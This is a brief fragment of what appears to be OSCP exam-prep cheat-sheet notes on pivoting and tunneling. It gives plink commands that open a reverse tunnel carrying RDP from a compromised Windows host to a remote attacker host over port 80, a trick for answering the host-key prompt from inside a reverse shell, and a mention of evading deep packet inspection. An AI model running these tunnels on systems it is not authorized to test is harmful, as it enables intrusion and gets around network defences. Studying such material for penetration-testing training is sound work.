tkashro/oscp-notes/cheat-sheets/Networking_Pivoting_Tunneling.md

     *   Port 22 blocked?
 Try port 80? or 443?

         `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80`

+    *   This will most likely not work with the interactivity level we have in a typical reverse shell, so we should pipe the answer to the prompt with the `cmd.exe /c echo y` command.

+        `cmd.exe /c echo y | plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80`

 *   Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)